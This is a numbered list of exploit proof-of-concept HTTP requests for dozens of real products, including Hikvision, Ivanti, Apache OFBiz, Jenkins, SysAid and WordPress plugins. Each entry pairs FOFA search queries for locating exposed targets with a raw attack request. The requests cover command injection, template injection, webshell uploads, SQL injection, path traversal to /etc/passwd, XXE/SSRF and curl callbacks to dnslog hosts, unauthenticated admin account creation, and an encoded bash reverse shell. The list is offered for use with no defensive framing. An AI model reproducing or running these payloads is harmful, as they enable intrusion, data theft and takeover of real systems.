PAYLOAD


74. Seeyon M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x


76. Newcapec mobile campus service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}


GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x


77. F22 garment management software UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--


78. pkpmbs construction engineering quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--


GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x


79. BYTEVALUE (百为) traffic control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>


GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip


81. Uniview video surveillance main-cgi password leak
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip


82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost


83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}


85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is as follows; it drops a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Resulting URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese Tosei self-service washing machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping


87. DBAppSecurity Mingyu security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--


/jfhatuwe.php

88. DBAppSecurity Mingyu security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close


/astdfkhl.php

89. Seeyon FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+


90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig


91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


92. Hikvision operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD


93. Qi An Xin Legendsec SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--


GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36


94. 奇安信网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--


GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 value of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);


Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast 盈可视 HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
      <ds:SignedInfo>
        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>
        <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
      </ds:SignedInfo>
      <<ds:SignatureValue>qwerty</ds:SignatureValue>
      <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
        <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>
      </ds:KeyInfo>
      <ds:Object></ds:Object>
    </ds:Signature>
  </soap:Body>
</soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==


The SAMLRequest value is the base64 encoding of the XML document below:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json,text/javascript,*/*;q=0.01
X-Requested-with: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip,deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: [replace with your own token]
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip


Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
